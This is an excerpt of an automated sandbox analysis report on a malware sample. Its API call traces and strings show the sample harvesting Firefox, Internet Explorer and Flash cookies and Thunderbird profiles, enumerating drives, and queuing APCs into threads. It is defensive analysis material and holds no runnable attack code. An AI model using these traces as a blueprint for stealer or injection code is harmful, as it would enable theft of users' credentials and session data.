Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: ee16bb75b484c13c91bb35ccc4b2f462f09ccaf56d53c8a31446ff846f0b91f0
Instruction ID: 235c9711f1a94e3fc4ca59b3d33c993f30a62e7ecc878777d15750747ae4b525
Opcode Fuzzy Hash: ee16bb75b484c13c91bb35ccc4b2f462f09ccaf56d53c8a31446ff846f0b91f0
Instruction Fuzzy Hash: A4A012915A48853D300D11037D17C3E811CC0D8B103304319F481800406BD01CC11431

Uniqueness

Uniqueness Score: 0.02%

Function 001E07A4, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001E0796

Part of subcall function 001E08E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00022654,\l), ref: 001E0962

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: d348d80718c8d0ced4234e6cfe2b369510dde8abe336d6e7c983b5bd42ca7e66
Instruction ID: c4e9b38bc74c3cfb579b3fcf620668632e36b46a27daa349323c1e7548960976
Opcode Fuzzy Hash: d348d80718c8d0ced4234e6cfe2b369510dde8abe336d6e7c983b5bd42ca7e66
Instruction Fuzzy Hash: 7AA002955A99927D710D51537D17C3E911CC4DCB513314619F482840456BD01DC55571

Uniqueness

Uniqueness Score: 0.02%

Function 004016D2, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004016D2(void* __eax, intOrPtr _a4) {

				 *0x404110 =  *0x404110 & 0x00000000;
				_push(0);
				_push(0x40410c);
				_push(1);
				_push(_a4);
				 *0x404108 = 0xc; // executed
				L004016CC(); // executed
				return __eax;
			}

0x004016d2
0x004016d9
0x004016db
0x004016e0
0x004016e2
0x004016e6
0x004016f0
0x004016f5

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401F9F,00000001,0040410C,00000000), ref: 004016F0

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 15046978bda6f55d550d72edfc83b66f377d19ed1c905e445328cfc1f321a0d0
Instruction ID: 975a160d7eeadca816de29d7c2f35f65806189f33d86fda40a0ad49640d60b77
Opcode Fuzzy Hash: 15046978bda6f55d550d72edfc83b66f377d19ed1c905e445328cfc1f321a0d0
Instruction Fuzzy Hash: 87C04CF8154351A7E610EB409D4EF157A9177F4705F204929B314381F183F910D8895D

Uniqueness

Uniqueness Score: 0.54%

Function 001D3574, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3c51feb3693a50dd800c040498d866e5cdbba2aad41f50f21f278e87011ac468
Instruction ID: c025048dd2fd0cc8ae20410012332bf21ea95c0cb5473f7639ea7d56abc98723
Opcode Fuzzy Hash: 3c51feb3693a50dd800c040498d866e5cdbba2aad41f50f21f278e87011ac468
Instruction Fuzzy Hash: 58B01271100240BFCB214B80DE44F0D7A22A750700F104010F304088F08A7104A0EB05

Uniqueness

Uniqueness Score: 0.00%

Function 001C3F6D, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,?,001C1091,00000000), ref: 001C3F79

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3b8a3fe22201b489c2984029dc93f346d0499a8abd1eb460ba22904bca33ae51
Instruction ID: 2389ba7ab26efd1ad4b0a9c6cc4a0a8f5d63194e0a6e143044322a9e0f404efb
Opcode Fuzzy Hash: 3b8a3fe22201b489c2984029dc93f346d0499a8abd1eb460ba22904bca33ae51
Instruction Fuzzy Hash: 73B01231000140BFCB018B80DD44F0D7B22A750700F008410F204484F0827104E0EB05

Uniqueness

Uniqueness Score: 0.04%

Function 00412618, Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(Function_00003594,?,00416CD9,?,?,?,?,?,00000000,00000000,00000000), ref: 0041261D

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 242ee7c7c05b4b9b480ab2d83c0d4a1538522c8b2c31294d4a3b647b685add38
Instruction ID: d9728e474c4429ac24dcbe2fdbce15d8b6a7f12160e240867de70947553b2bcb
Opcode Fuzzy Hash: 242ee7c7c05b4b9b480ab2d83c0d4a1538522c8b2c31294d4a3b647b685add38
Instruction Fuzzy Hash: B3A022F82023008FCFA00F30AF882883EE0E28C3023200032A000E0A30CFB000C08E0C

Uniqueness

Uniqueness Score: 0.01%

Function 00411864, Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,004129E2,0041FE48,00000314,00000000,?,?,?,?,?,00410FB7,0041FE48,00401B48,00012010), ref: 00411866

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: f6338d97be529d650524bd856a3e536349430332f03489a33f5a19bf9d6e6fa9
Instruction ID: bda036b73ae057f3786374814e8995f8ed58256c5b8bbf52336c86182bb57cf2
Opcode Fuzzy Hash: f6338d97be529d650524bd856a3e536349430332f03489a33f5a19bf9d6e6fa9
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: 0.01%

Function 00416850, Relevance: 1.3, APIs: 1, Instructions: 88memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000000,008541BC,?,?), ref: 00416911

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 491e4c0254d0562682f40171fc46b1d1d2753d33f0d55c1c58bb3b9b057f5416
Instruction ID: 9d6b720f832553b120e63d2d0d9692bafa692ad488b918e4d9f9a36df70d1e96
Opcode Fuzzy Hash: 491e4c0254d0562682f40171fc46b1d1d2753d33f0d55c1c58bb3b9b057f5416
Instruction Fuzzy Hash: BC31B2B59403109BC360EF95ED816EA77F8F798305F12403FE44893260D73898CA8FAA

Uniqueness

Uniqueness Score: 0.03%

Function 00AB33BD, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00AB340E

Memory Dump Source

Source File: 00000005.00000002.926412959.0000000000AB2000.00000040.00000001.sdmp, Offset: 00AB2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ab2000_CVPFktt.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 7d169ee1afa74e95ea466d078f76261f68e1cd9eb89ca309179d122eb221552a
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 73113C79A00208FFDB01DF98CA85E99BBF5AF08751F0580A4F9489B362D771EA50DF80

Uniqueness

Uniqueness Score: 0.00%

Function 001C1184, Relevance: 1.3, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

memset.NTDLL ref: 001C11A2

Part of subcall function 001D6093: memset.NTDLL ref: 001D60B9
Part of subcall function 001D6093: memcpy.NTDLL ref: 001D60E1
Part of subcall function 001D6093: GetLastError.KERNEL32(00000010,00000218,001E0F5D,00000100,?,00000318,00000008), ref: 001D60F8
Part of subcall function 001D6093: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E0F5D,00000100), ref: 001D61DB

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ErrorLastmemset$AllocateHeapmemcpy
String ID:
API String ID: 4290293647-0
Opcode ID: 7c5d60d93228b59ecb2c13f222d3c0f9b793cff66f4038f4a72221ec7bb06880
Instruction ID: 2ab0923197cbc61bd72a1cd55e21b163a39a0ffad34012a3c07f883c311e6dad
Opcode Fuzzy Hash: 7c5d60d93228b59ecb2c13f222d3c0f9b793cff66f4038f4a72221ec7bb06880
Instruction Fuzzy Hash: 440121709013486BCB21AF39DC41F9B3BE8AF66754F04842EFD4496342C374DA04DBA2

Uniqueness

Uniqueness Score: 0.00%

Function 001D54F9, Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 001D5503

Part of subcall function 001CD862: RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00020119,?,?,Software\AppDataLow\Software\Microsoft\,00000000), ref: 001CD89B
Part of subcall function 001CD862: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00020019,?,?,Software\AppDataLow\Software\Microsoft\,00000000), ref: 001CD8AF
Part of subcall function 001CD862: RegCloseKey.KERNELBASE(?,?,Software\AppDataLow\Software\Microsoft\,00000000), ref: 001CD8F8

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Open$Closememset
String ID:
API String ID: 1685373161-0
Opcode ID: 9684beeb6b00c0b81a3eddceb48e1ea32eb24fc558dbd5a8f29a87328df48fa2
Instruction ID: fcd0f910b3fa8091d8736ee69b84a10d411c54c3ecb629441928f8ae99afa09e
Opcode Fuzzy Hash: 9684beeb6b00c0b81a3eddceb48e1ea32eb24fc558dbd5a8f29a87328df48fa2
Instruction Fuzzy Hash: 54E0673114010CB7DF117E56EC42F8A3B66AF307A0F50C029FE186E2A2D772DA659B95

Uniqueness

Uniqueness Score: 0.00%

Function 001D566D, Relevance: 1.3, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,001E2668,0000002C,001D641E,NTDLL.DLL,6547775A,00000000,001D60C6,?,00000318), ref: 001D5687

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 9e5b076556d4051ee5a253701a4447fbde0425c17354f47964bf088be421e69e
Instruction ID: af36dcf48a4c0260679fd98aae818768651e51a48dfa278595a281b92af01179
Opcode Fuzzy Hash: 9e5b076556d4051ee5a253701a4447fbde0425c17354f47964bf088be421e69e
Instruction Fuzzy Hash: B8D01730D00659EBCB209F95DC8A99EFB71BF09710F608225E960772E0C3305A11CF90

Uniqueness

Uniqueness Score: 0.02%

Non-executed Functions

Function 001CB18E, Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 158memorystringfileUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32(%APPDATA%,001E0E6C,00000000,00000000,001C8F8F), ref: 001CB1A6

Part of subcall function 001C8069: lstrlenW.KERNEL32(?,00000000,00000000,?,00000250,?,00000000), ref: 001C80B5
Part of subcall function 001C8069: lstrlenW.KERNEL32(?,?,00000000), ref: 001C80C1
Part of subcall function 001C8069: memset.NTDLL ref: 001C8109
Part of subcall function 001C8069: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001C8124
Part of subcall function 001C8069: lstrlenW.KERNEL32(000000D3), ref: 001C815C
Part of subcall function 001C8069: lstrlenW.KERNEL32(?), ref: 001C8164
Part of subcall function 001C8069: memset.NTDLL ref: 001C8187
Part of subcall function 001C8069: wcscpy.NTDLL ref: 001C8199

Part of subcall function 001C8069: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 001C81BF
Part of subcall function 001C8069: RtlEnterCriticalSection.NTDLL(?), ref: 001C81F4
Part of subcall function 001C8069: RtlLeaveCriticalSection.NTDLL(?), ref: 001C8210
Part of subcall function 001C8069: FindNextFileW.KERNEL32(?,00000000), ref: 001C8229
Part of subcall function 001C8069: WaitForSingleObject.KERNEL32(00000000), ref: 001C823B
Part of subcall function 001C8069: FindClose.KERNEL32(?), ref: 001C8250
Part of subcall function 001C8069: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001C8264
Part of subcall function 001C8069: lstrlenW.KERNEL32(000000D3), ref: 001C8286

RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001CB1F1
mbstowcs.NTDLL ref: 001CB204
lstrcatW.KERNEL32(00000000,\Macromedia\Flash Player\), ref: 001CB213

Part of subcall function 001C8069: FindNextFileW.KERNEL32(?,00000000), ref: 001C82FC
Part of subcall function 001C8069: WaitForSingleObject.KERNEL32(00000000), ref: 001C830E
Part of subcall function 001C8069: FindClose.KERNEL32(?), ref: 001C8329

HeapFree.KERNEL32(00000000,00000000,00000000,*.sol,?,00000000,00000000,00000010), ref: 001CB237
RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001CB249
lstrcatW.KERNEL32(00000000,001E2400), ref: 001CB26B
HeapFree.KERNEL32(00000000,00000000), ref: 001CB28F
CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001CB2B5
DeleteFileW.KERNEL32(?), ref: 001CB304
HeapFree.KERNEL32(00000000,?), ref: 001CB312
HeapFree.KERNEL32(00000000,?), ref: 001CB32E

Strings

cookies.sqlite, xrefs: 001CB1B9
%APPDATA%, xrefs: 001CB19A, 001CB19F, 001CB202
\cookie.ff, xrefs: 001CB2D9
*.sol, xrefs: 001CB221
cookies.sqlite-journal, xrefs: 001CB1D4
%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001CB1BE, 001CB1C3, 001CB1D9
\cookie.ie, xrefs: 001CB2E0
\sols, xrefs: 001CB2E7
*.txt, xrefs: 001CB279
\Macromedia\Flash Player\, xrefs: 001CB20D

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrlen$Free$AllocateCloseCriticalFirstNextObjectSectionSingleWaitlstrcatmemset$CreateDeleteDirectoryEnterLeaveNamePathmbstowcswcscpy
String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$*.sol$*.txt$\Macromedia\Flash Player\$\cookie.ff$\cookie.ie$\sols$cookies.sqlite$cookies.sqlite-journal
API String ID: 3339037760-1988282036
Opcode ID: 5b1071edcb034aa6e877cd9e8252e13b80e7c10718d4e21c4c952055606209b7
Instruction ID: ac6c22f82cc47310f6e369eacb1977c72cd652c82396cb09bac62814c24cf0d1
Opcode Fuzzy Hash: 5b1071edcb034aa6e877cd9e8252e13b80e7c10718d4e21c4c952055606209b7
Instruction Fuzzy Hash: A651CE71900A88BFDB219BE6DCC9DAFBBBCEBA5700B100429F501E65A1D7709D81CB60

Uniqueness

Uniqueness Score: 100.00%

Function 001DB8FF, Relevance: 34.7, APIs: 23, Instructions: 224memoryfiletimeUNIQUE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,DE9FBDEB), ref: 001DB92D
RtlAllocateHeap.NTDLL(00000000,DE9FBDEB), ref: 001DB950
memset.NTDLL ref: 001DB96B

Part of subcall function 001CEDA6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,DE9FBDE6,001DB984,73797325), ref: 001CEDB7
Part of subcall function 001CEDA6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 001CEDD1

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,?,00000080,00000000,73797325), ref: 001DB9AC
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001DB9C2
CloseHandle.KERNEL32(?), ref: 001DB9DC
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 001DB9E9
lstrcat.KERNEL32(?,642E2A5C), ref: 001DBA2E
FindFirstFileA.KERNEL32(?,?), ref: 001DBA43
CompareFileTime.KERNEL32(?,?), ref: 001DBA61
FindNextFileA.KERNEL32(?,?), ref: 001DBA74
FindClose.KERNEL32(?), ref: 001DBA82
FindFirstFileA.KERNEL32(?,?), ref: 001DBA8D
CompareFileTime.KERNEL32(?,?), ref: 001DBAAD
StrChrA.SHLWAPI(?,0000002E), ref: 001DBAE5
memcpy.NTDLL(?,?,00000000), ref: 001DBB1B
FindNextFileA.KERNEL32(?,?), ref: 001DBB30
FindClose.KERNEL32(?), ref: 001DBB3E
FindFirstFileA.KERNEL32(?,?), ref: 001DBB49
CompareFileTime.KERNEL32(?,?), ref: 001DBB59
FindClose.KERNEL32(?), ref: 001DBB92
HeapFree.KERNEL32(00000000,?,73797325), ref: 001DBBA5
HeapFree.KERNEL32(00000000,?), ref: 001DBBB6

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
String ID:
API String ID: 455834338-0
Opcode ID: b34c2c16c74a9d1193bee86c93e6d14877873da3948767f327de964a310df832
Instruction ID: 9de4737559ab64bc6d18a8882dd8dcff875f3b299bf056b552687b8de287df94
Opcode Fuzzy Hash: b34c2c16c74a9d1193bee86c93e6d14877873da3948767f327de964a310df832
Instruction Fuzzy Hash: 0A813272508341AFD710DF65DC84A6FBBE9FB98340F01092EF596D62A1E770D984CB62

Uniqueness

Uniqueness Score: 100.00%

Function 001C8069, Relevance: 28.7, APIs: 19, Instructions: 233stringfilesynchronizationUNIQUE

Download Yara Rule

APIs

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

Part of subcall function 001C89E0: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000104,001C809D,?,00000250,?,00000000), ref: 001C89F7
Part of subcall function 001C89E0: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 001C8A11

lstrlenW.KERNEL32(?,00000000,00000000,?,00000250,?,00000000), ref: 001C80B5
lstrlenW.KERNEL32(?,?,00000000), ref: 001C80C1
memset.NTDLL ref: 001C8109
FindFirstFileW.KERNEL32(00000000,00000000), ref: 001C8124
lstrlenW.KERNEL32(000000D3), ref: 001C815C
lstrlenW.KERNEL32(?), ref: 001C8164
memset.NTDLL ref: 001C8187
wcscpy.NTDLL ref: 001C8199
PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 001C81BF
RtlEnterCriticalSection.NTDLL(?), ref: 001C81F4

Part of subcall function 001C3F6D: RtlFreeHeap.NTDLL(00000000,?,001C1091,00000000), ref: 001C3F79

RtlLeaveCriticalSection.NTDLL(?), ref: 001C8210
FindNextFileW.KERNEL32(?,00000000), ref: 001C8229
WaitForSingleObject.KERNEL32(00000000), ref: 001C823B
FindClose.KERNEL32(?), ref: 001C8250
FindFirstFileW.KERNEL32(00000000,00000000), ref: 001C8264
lstrlenW.KERNEL32(000000D3), ref: 001C8286
FindNextFileW.KERNEL32(?,00000000), ref: 001C82FC
WaitForSingleObject.KERNEL32(00000000), ref: 001C830E
FindClose.KERNEL32(?), ref: 001C8329

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
String ID:
API String ID: 2962561936-0
Opcode ID: 1a284c3623d459db7889439f0153e2381f2e8e433b92e64f77fa24200c3d29fd
Instruction ID: 41d554c6eaa5966aeaadc1ff98546c92b346f30c83c2332a8732daf8ab7c9aab
Opcode Fuzzy Hash: 1a284c3623d459db7889439f0153e2381f2e8e433b92e64f77fa24200c3d29fd
Instruction Fuzzy Hash: 4E817771504385AFC711AF68DCC4F1BBBE8BFA8700F04482DF595962A2DB74D944CB62

Uniqueness

Uniqueness Score: 100.00%

Function 001CFE72, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 429memoryCOMMON

Download Yara Rule

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,?,00000000), ref: 001CFEAA
StrToIntExA.SHLWAPI(00000000,00000000,?,?,00000000), ref: 001CFEDC
StrToIntExA.SHLWAPI(00000000,00000000,?,?,00000000), ref: 001CFF0E
StrToIntExA.SHLWAPI(00000000,00000000,?,?,00000000), ref: 001CFF40
StrToIntExA.SHLWAPI(00000000,00000000,?,?,00000000), ref: 001CFF72
StrToIntExA.SHLWAPI(00000000,00000000,?,?,00000000), ref: 001CFFA4
StrToIntExA.SHLWAPI(00000000,00000000,?,?,00000000), ref: 001CFFD6
StrToIntExA.SHLWAPI(00000000,00000000,?,?,00000000), ref: 001D0008
StrToIntExA.SHLWAPI(00000000,00000000,?,?,00000000), ref: 001D003A
HeapFree.KERNEL32(00000000,?,Keys,?,?,?,00000000), ref: 001D00F4
HeapFree.KERNEL32(00000000,?,Scr,?,?,?,00000000), ref: 001D00AA

Part of subcall function 001D34F0: lstrlen.KERNEL32(00000000,00000000,779F5520,001D011E,Keys,?,?,?,00000000), ref: 001D3506
Part of subcall function 001D34F0: mbstowcs.NTDLL ref: 001D3522

StrToIntExA.SHLWAPI(00000000,00000000,?,Keys,?,?,?,00000000), ref: 001D014C

Part of subcall function 001D1DE6: lstrlen.KERNEL32(?,00000000,?,00000001,001C62CA,00000000,?,?,?,?,?,?,?,?,001CD74D,?), ref: 001D1DEF
Part of subcall function 001D1DE6: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,?,?,?,?,?,001CD74D,?), ref: 001D1E12
Part of subcall function 001D1DE6: memset.NTDLL ref: 001D1E21

Part of subcall function 001D4E7A: RtlEnterCriticalSection.NTDLL(03E58D20), ref: 001D4E83
Part of subcall function 001D4E7A: HeapFree.KERNEL32(00000000,?,?,00000000), ref: 001D4EB5
Part of subcall function 001D4E7A: RtlLeaveCriticalSection.NTDLL(03E58D20), ref: 001D4ED3

Strings

Keys, xrefs: 001D00B4
Scr, xrefs: 001D0089

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: FreeHeap$CriticalSectionlstrlen$EnterLeavembstowcsmemcpymemset
String ID: Keys$Scr
API String ID: 3326067637-3950322802
Opcode ID: 5b3cefea7e9f2543abb2ab62ff1f837f318748145c180471ec73d942df1a6386
Instruction ID: 8c6da03b281d374e38c0fdc6ae07f642683945a16a24b64d66a132470248f82c
Opcode Fuzzy Hash: 5b3cefea7e9f2543abb2ab62ff1f837f318748145c180471ec73d942df1a6386
Instruction Fuzzy Hash: 7AD1C371B01215ABCB12EBB48C88F6F77A99F6D780B55492AB801EB305DB30DD81CB60

Uniqueness

Uniqueness Score: 5.54%

Function 001C580F, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 91memorystringsynchronizationUNIQUE

Download Yara Rule

APIs

wcscpy.NTDLL ref: 001C583C
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 001C5848
RtlAllocateHeap.NTDLL(00000000,?), ref: 001C5859
memset.NTDLL ref: 001C5876
GetLogicalDriveStringsW.KERNEL32(?,?), ref: 001C5884
WaitForSingleObject.KERNEL32(00000000), ref: 001C5892
GetDriveTypeW.KERNEL32(?), ref: 001C58A0
lstrlenW.KERNEL32(?), ref: 001C58AC
wcscpy.NTDLL ref: 001C58BF
lstrlenW.KERNEL32(?), ref: 001C58D9
HeapFree.KERNEL32(00000000,?), ref: 001C58F2

Strings

\\?\, xrefs: 001C5833

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
String ID: \\?\
API String ID: 3888849384-4282027825
Opcode ID: aef57646cef768eadcef493bfc2c5514139c5e6ef3cc1504dededa0359ad6da2
Instruction ID: 1e51159f2f1d3e893c42260656fe2de50628e95b6af62b73d7142a7bcb56377d
Opcode Fuzzy Hash: aef57646cef768eadcef493bfc2c5514139c5e6ef3cc1504dededa0359ad6da2
Instruction Fuzzy Hash: B8315E32800108BFCB119BA6DC88CDEBF7EEF59364B608029F104E6160DB70AA95DB60

Uniqueness

Uniqueness Score: 100.00%

Function 001C6641, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 65threadprocesslibraryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 001C6667
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001C6673
GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess), ref: 001C668A
GetProcAddress.KERNEL32(00000000), ref: 001C6691
Thread32First.KERNEL32(?,0000001C), ref: 001C66A1
OpenThread.KERNEL32(001F03FF,00000000,?), ref: 001C66BC
QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001C66CD
CloseHandle.KERNEL32(00000000), ref: 001C66D4
Thread32Next.KERNEL32(?,0000001C), ref: 001C66DD
CloseHandle.KERNEL32(?), ref: 001C66E9

Strings

ExitProcess, xrefs: 001C6680
KERNEL32.DLL, xrefs: 001C6685

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
String ID: ExitProcess$KERNEL32.DLL
API String ID: 2341152533-108369947
Opcode ID: 5003232bd5a98efb9d1a98125e72eb264449e6ed21b018e692cc920bcdf6ae6e
Instruction ID: 6d20e50d57914a5fd1054eb9f4c9bd1e2283a1df84acacfb0d207b887ada4a87
Opcode Fuzzy Hash: 5003232bd5a98efb9d1a98125e72eb264449e6ed21b018e692cc920bcdf6ae6e
Instruction Fuzzy Hash: F4115E71900168BFDF10AFE0DC85EAE7B7DFB58391F14412AFA01A6190D730C981DBA0

Uniqueness

Uniqueness Score: 1.74%

Function 001D9F28, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107stringfileUNIQUE

Download Yara Rule

APIs

Part of subcall function 001D7CDA: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,00000000,?,001C678E,?), ref: 001D7CEB
Part of subcall function 001D7CDA: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,001C678E,?), ref: 001D7D08

FreeLibrary.KERNEL32(?), ref: 001DA050

Part of subcall function 001D8FF6: lstrlenW.KERNEL32(?,00000000,?,?,?,001D9F95,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 001D9003
